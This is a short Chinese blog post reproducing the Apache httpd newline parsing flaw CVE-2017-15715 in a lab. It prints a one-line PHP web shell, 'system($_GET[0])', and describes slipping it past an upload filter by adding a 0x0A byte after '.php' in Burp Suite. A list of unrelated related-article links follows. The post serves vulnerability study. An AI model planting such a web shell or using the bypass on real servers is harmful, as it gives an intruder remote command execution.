Apache httpd 换行解析漏洞复现(CVE-2017-15715)

Web页面:

新建一个一句话木马:

0.php

复制代码
<?php system($_GET[0]); ?>

上传木马, burpsuite 抓包。

直接上传是回显 bad file。

我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。

send 后,我们访问一下。发现木马上传成功。

相关推荐
Whoami!2 小时前
2-3〔O҉S҉C҉P҉ ◈ 研记〕❘ 漏洞扫描▸AppScan(WEB扫描)
网络安全·信息安全·appscan·oscp
sinat_286945197 小时前
AI应用安全 - Prompt注入攻击
人工智能·安全·prompt
秃了也弱了。8 小时前
WireShark:非常好用的网络抓包工具
网络·测试工具·wireshark
清源妙木真菌9 小时前
应用层协议——HTTP
网络·网络协议·http
网硕互联的小客服13 小时前
Apache 如何支持SHTML(SSI)的配置方法
运维·服务器·网络·windows·php
共享家952715 小时前
linux-数据链路层
linux·网络·macos
数据智能老司机15 小时前
实现逆向工程——理解 x86 机器架构
安全·逆向
数据智能老司机15 小时前
实现逆向工程——逆向工程的影响
安全·逆向
1892280486118 小时前
NY243NY253美光固态闪存NY257NY260
大数据·网络·人工智能·缓存
玩转以太网19 小时前
3 种方式玩转网络继电器!W55MH32 实现网页 + 阿里云 + 本地控制互通
网络·物联网·阿里云